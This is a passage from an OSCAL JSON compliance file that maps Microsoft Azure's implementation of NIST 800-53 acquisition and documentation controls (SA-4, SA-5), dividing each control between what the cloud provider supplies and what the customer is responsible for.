(ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"9aaf62e4-cd1b-4f7a-a5ca-a1bf43b52b10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-016"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"3b3319f8-36d6-435d-b3d5-f0b79c48c799"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5e399dd9-0d08-4d51-9c97-7a8c0e88f113","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-017"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.e","by-components":[{"uuid":"b2d5e2b7-74d0-4c3a-a31e-45c758b3f0b2","export":{"provided":[{"uuid":"137cd12d-fcd6-4a84-9d68-9465cba4d934","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-017"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"39c9fa68-c5e6-487d-a22a-4b0b201be626","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-017"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"137cd12d-fcd6-4a84-9d68-9465cba4d934"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"6d20519f-abf7-4c27-b130-25d373256811","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.f","by-components":[{"uuid":"a6a5ddd4-6b45-48e1-be76-1e4e8c8def17","export":{"provided":[{"uuid":"2d24f017-5e16-4d22-8a1c-0ba2eb0becac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-018"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"52ef1d4f-ab88-411f-91ce-c0238c6f4d04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-018"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"2d24f017-5e16-4d22-8a1c-0ba2eb0becac"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"68c93acf-b026-4902-835e-25760ea640fb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-019"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.g","by-components":[{"uuid":"c1133562-3069-48f0-b215-740f8062e371","export":{"provided":[{"uuid":"8cebfcc8-3355-476d-91db-9772aa94f8e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-019"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"24f68ed9-d7ce-49bf-8334-274b61027612","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-019"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"8cebfcc8-3355-476d-91db-9772aa94f8e8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"32491fa8-88a7-4a77-a741-6df4513ef1e3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-020"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.h","by-components":[{"uuid":"861f5948-af50-4ee6-a054-96ad7c1fbca6","export":{"provided":[{"uuid":"421aa590-30a2-4872-ba24-2a682469b822","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-020"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"82efa5a2-8815-4db0-902b-9b7218643724","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-020"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"421aa590-30a2-4872-ba24-2a682469b822"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"3c92a990-b3a4-4922-95e2-1ea6bbf0083a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-021"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4_smt.i","by-components":[{"uuid":"f6b215d0-6c55-426d-8dae-3820da91b8cf","export":{"provided":[{"uuid":"2af45f11-406d-4077-95ac-4264ed7f99d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-021"}],"description":"Azure implements the acquisitions control through enforcement of the Microsoft Security Policy (MSP). The Policy dictates that where a third party is allowed to (i) access, process, host or manage Microsoft's online services' information assets or information processing facilities, or (ii) add products or services to Microsoft's online services' information processing facilities, arrangements must be made in a formal contract to define responsibility and requirements for the security, confidentiality, integrity and availability of the information assets involved. Appropriate security and privacy standards are addressed in the agreement, to provide a level of protection against identified risks equivalent to that provided by the MSP. It is the role of Corporate, External, and Legal Affairs (CELA) to require language included in system acquisition contracts pertaining to the security requirements, as appropriate, through the Master Supplier Services Agreement (MSSA) or an equivalent type of agreement."}],"responsibilities":[{"uuid":"c4d61988-2eac-44e9-8cbf-4591e60d8387","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-021"}],"description":"The customer is responsible for implementing an acquisition process for customer-deployed resources that includes security and privacy functional requirements, strength of mechanism requirements, security and privacy assurance requirements, necessary controls to satisfy said security and privacy requirements, documentation requirements, requirements for protecting security and privacy-related documentation, a description of the customer's development and operating environments, allocation of or identify of parties responsible for security, privacy, and supply chain risk management, and the acceptance criteria for the contract.","provided-uuid":"2af45f11-406d-4077-95ac-4264ed7f99d9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"df84eabb-d726-49ad-85e8-0d10f0ce5653","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.1","statements":[{"uuid":"3288168d-b838-425a-8c5f-a1db7e26e5d4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-022"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.1_smt","by-components":[{"uuid":"23d92439-3bbd-495c-a0b9-39e49910076a","export":{"provided":[{"uuid":"4b3a9e93-694a-4336-9752-7b437656268e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-022"}],"description":"The acquisition process includes contractual requirements to provide documentation of security functionality. Documentation provided in response to this requirement is stored by Azure service teams in their internal SharePoint sites._x000D_ _x000D_"}],"responsibilities":[{"uuid":"c144e2d6-68ce-4035-852b-18b1a79db879","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-022"}],"description":"The customer is responsible for obtaining a description of the functional properties of security controls to be employed from the developer of the corresponding customer-deployed resource(s). Note: Microsoft Azure hosts the customer-deployed system. The customer can find a description of the security controls employed by Azure below.","provided-uuid":"4b3a9e93-694a-4336-9752-7b437656268e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"f15bb7e5-ddde-4b77-899a-e683add4fd7d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.2","statements":[{"uuid":"d916868c-d455-48ec-ac92-f69c2ae916e5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-023"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.2_smt","by-components":[{"uuid":"6bf57916-d069-4e6a-8c4d-76e0ab4bf6dc","export":{"provided":[{"uuid":"e905bd7d-1bb3-42fc-b422-9d58cde71628","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-023"}],"description":"The acquisition process includes contractual requirements to provide documentation of security functionality, including security-relevant external system interfaces and high-level design. Documentation provided in response to this requirement is stored by Azure service teams in their internal SharePoint sites._x000D_ _x000D_"}],"responsibilities":[{"uuid":"4c105ce6-fb5a-4286-aa76-08562ab5405a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-023"}],"description":"The customer is responsible for obtaining design and implementation information for the security controls to be employed from the developer of the corresponding customer-deployed resource(s), that includes: security-relevant external system interfaces; high-level design; low-level design; source code schematics; and any customer-defined design/implementation information at an organization-defined level of detail in the design and implementation information. Note: Microsoft Azure hosts the customer-deployed system. The customer can find a description of the security controls employed by Azure below.","provided-uuid":"e905bd7d-1bb3-42fc-b422-9d58cde71628"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"80237b50-4d02-4376-b5a8-55adc04382e8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.5","statements":[{"uuid":"c477bf7b-905c-4a07-835d-f215bad651a9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-024"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.5_smt.a","by-components":[{"uuid":"d16c71c4-3fb1-4dea-9b17-80c240d84f44","export":{"provided":[{"uuid":"72a41699-82e7-4196-9e52-da39ddcd693a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-024"}],"description":"Azure ensures consistent and required configurations applied through both Azure Security Pack (AzSecPack) implementations and the Security Development Lifecycle (SDL). AzSecPack ensures the application and enforcement of the Azure security baseline, which is based on a hyperscale-compatible subset of DISA STIG and CIS Benchmark requirements. The SDL ensures that any Microsoft-authored code complies with scanning and code requirements."}],"responsibilities":[{"uuid":"f580f894-108d-4f03-a3d2-917e616ad388","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-024"}],"description":"The customer is responsible for requiring the developer of the information system, system component, or information system service to deliver the system, component, or service with organization-defined security configurations implemented.","provided-uuid":"72a41699-82e7-4196-9e52-da39ddcd693a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a183ffd5-bb69-4639-a5ef-dedea1de94f8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-025"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.5_smt.b","by-components":[{"uuid":"a2312ff5-68d9-4095-953a-ece4a2f30295","export":{"provided":[{"uuid":"673cfe62-ff52-4c20-bdac-39d573da0095","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-025"}],"description":"Azure ensures consistent and required configurations applied through both Azure Security Pack (AzSecPack) implementations and the Security Development Lifecycle (SDL). System, component, and service reinstallation and upgrade are handled through the same processes, ensuring consistency of baselines."}],"responsibilities":[{"uuid":"7920ef01-b1b6-41f6-aae3-2e3f7e5d967e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-025"}],"description":"The customer is responsible for requiring the developer of the information system, system component, or information system service to use the configurations as the default for any subsequent system, component, or service reinstallation or upgrade.","provided-uuid":"673cfe62-ff52-4c20-bdac-39d573da0095"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"896fd685-56bb-46ed-a61f-488dc876b7ec","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.9","statements":[{"uuid":"d6194bf1-40c7-40dc-a8a8-56975f5d8627","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-026"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sa-4.9_smt","by-components":[{"uuid":"25d38c7f-89d9-452a-ba05-cce94bd6542d","export":{"provided":[{"uuid":"df6ae244-be33-4c6c-a09b-9f3b310a840e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-026"}],"description":"Azure follows the Security Development Lifecycle (SDL) process, which includes as part of the design phase the identification of the functions, ports, protocols, and services intended for organizational use._x000D_ _x000D_"}],"responsibilities":[{"uuid":"6199c913-be37-4dd2-9eb5-ed8db263c570","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-026"}],"description":"The customer is responsible for requiring the developer of customer-deployed resource(s) to identify ports, protocols, and services intended for use early in the SDLC. Note: Microsoft Azure hosts the customer-deployed system. The customer can find a description of the security controls employed by Azure below.","provided-uuid":"df6ae244-be33-4c6c-a09b-9f3b310a840e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"27750995-6442-45ba-b0c3-3921abd236ba","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-4.10","statements":[{"uuid":"ee402ee9-309d-4eeb-a7e9-061470ce39a1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-027"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"sa-4.10_smt","by-components":[{"uuid":"36ef34df-2e0e-459c-8a84-3069b1b6341a","export":{"provided":[{"uuid":"49c24291-2d3e-40ce-b9e0-83e716cf4b2a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-027"}],"description":"Azure does not utilize Personal Identity Verification (PIV) credentials for internal personnel because PIV cards are not available to Azure._x000D_ _x000D_"}],"responsibilities":[{"uuid":"3f2732ec-4b3d-402c-a957-494757073af2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-027"}],"description":"The customer is responsible for employing FIPS 201-approved technology products to support Personal Identity Verification (PIV) capability. Note: if the customer does not deploy PIV credentials this control is not applicable.","provided-uuid":"49c24291-2d3e-40ce-b9e0-83e716cf4b2a"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"675c4fc5-51f3-442c-9d53-f1398522d693","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"sa-5","statements":[{"uuid":"96c9e2e1-3866-495f-9566-8dde0b61daea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-028"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-029"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-030"}],"statement-id":"sa-5_smt.a","by-components":[{"uuid":"1b16a63a-4d03-46b7-8cdf-2a5bcfd9e592","export":{"provided":[{"uuid":"c2d1eba0-71ea-44f6-b2df-e9d311fe2892","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-028"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding secure configuration, installation, and operation of the Azure cloud. This documentation is stored in each service team's SharePoint site or internal Microsoft website such as KnowledgeBase and made available to service team members. Microsoft ensures the appropriate service team maintains, secures, manages, transmits and stores all service-specific documentation to prevent unauthorized access and misuse. Microsoft considers all documentation to be categorized as a system asset. The service team is responsible for classifying its assets and employing the associated safeguards according to the Asset Classification Standard and Asset Protection Standard, as well as any additional requirements defined by the service team. An asset is something that supports the delivery of the Azure service or has other business value to its internal Microsoft owner. The service's documentation inventory is located on the team SharePoint site or internal Microsoft website such as KnowledgeBase. The inventory of such document assets is maintained by service team Technical Support personnel and is updated as needed when new assets are created, installed or identified or the asset owner, location or security classification requires modification."},{"uuid":"8f2c394a-bdef-4e44-a96e-01bdf48c1eaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-029"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding effective use and maintenance of security and privacy features/functions of the Azure cloud. This documentation is stored in each service team's SharePoint site or internal Microsoft website such as KnowledgeBase and made available to service team members. Service team documentation, including but not limited to Standard Operating Procedures and Troubleshooting Guides (TSGs), are stored on each team's respective SharePoint site or internal Microsoft website such as KnowledgeBase as referenced in each team's asset inventory. Authorized service team personnel routinely develop, maintain and store all related security documentation (e.g., security policies and procedures) and system configuration files on a continuous basis in accordance with regulatory requirements. Documentation is centrally managed and available to only authorized personnel using role-based access."},{"uuid":"4594d7f0-3cbf-4ba3-a75d-9d0c0529a6a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-030"}],"description":"Azure service teams maintain, secure, manage, and store information system documentation, including documentation regarding known vulnerabilities regarding configuration and use of administrative (i.e. privileged) functions. Known vulnerabilities are identified in the assessment results and Plans of Action and Milestones (POA&Ms) as part of the Security Authorization package and maintained on the SharePoint site with the Azure Security Authorization documentation."}],"responsibilities":[{"uuid":"142e4378-bf39-490c-91ae-4c072f61a1ef","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-028"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing administrator documentation for customer-deployed resources that describes secure configuration, installation, and operation of the customer-deployed resources.","provided-uuid":"c2d1eba0-71ea-44f6-b2df-e9d311fe2892"},{"uuid":"89f7ec00-fa5a-4f9e-93b4-6f2de8efceb2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-029"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing administrator documentation for customer-deployed resources that describes effective use and maintenance of security and privacy functions/mechanisms.","provided-uuid":"8f2c394a-bdef-4e44-a96e-01bdf48c1eaa"},{"uuid":"4f489129-0bf1-46f4-9837-2b58adf4600c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-030"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing administrator documentation for customer-deployed resources that describes known vulnerabilities regarding configuration and use of administrative (i.e., privileged) functions.","provided-uuid":"4594d7f0-3cbf-4ba3-a75d-9d0c0529a6a5"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"4c3a0a93-79a3-4819-8478-65672cde0abe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-031"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-032"},{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-033"}],"statement-id":"sa-5_smt.b","by-components":[{"uuid":"ea28e237-afa2-40b0-ac8a-b545616ff45b","export":{"provided":[{"uuid":"8d7a7b78-26e5-4917-9f35-008b275e76a0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-031"}],"description":"Azure has extensive user-facing documentation on all aspects of the system, including security and privacy functions and their use. This documentation is available online at the following address: <https://learn.microsoft.com/en-us/azure/>"},{"uuid":"eb100a65-6d00-42f8-a090-843be1f13fa8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-032"}],"description":"Azure has extensive user-facing documentation on all aspects of the system, including methods for user interaction. This documentation is available online at the following address: <https://learn.microsoft.com/en-us/azure/>"},{"uuid":"6e603ca7-9113-4191-a310-15c1cb02722b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-033"}],"description":"Azure has extensive user-facing documentation on all aspects of the system, including maintaining the security of the service's resources and the privacy of individuals. This documentation is available online at the following address: <https://learn.microsoft.com/en-us/azure/>"}],"responsibilities":[{"uuid":"77bea9f1-2fba-4ffe-aec7-3ad1e104635f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-031"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing user documentation for customer-deployed resources that describes user-accessible security and privacy functions/mechanisms and how to effectively use them.","provided-uuid":"8d7a7b78-26e5-4917-9f35-008b275e76a0"},{"uuid":"f75e7c09-28b9-43c9-96aa-93280c3179c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-032"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing user documentation for customer-deployed resources that describes methods for user interaction, which enables individuals to use the customer-deployed resources in a more secure manner and protect individual privacy.","provided-uuid":"eb100a65-6d00-42f8-a090-843be1f13fa8"},{"uuid":"ceca8b67-e6e3-47e7-9c8a-9c63d85dd9ee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SA-15-033"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for obtaining or developing user documentation for customer-deployed resources that describes user responsibilities in maintaining the security of the customer-deployed resources and privacy of individuals.","provided-uuid":"6e603ca7-9113-4191-a310-15c1cb02722b"}]},"description":"See inheritance and customer responsibility 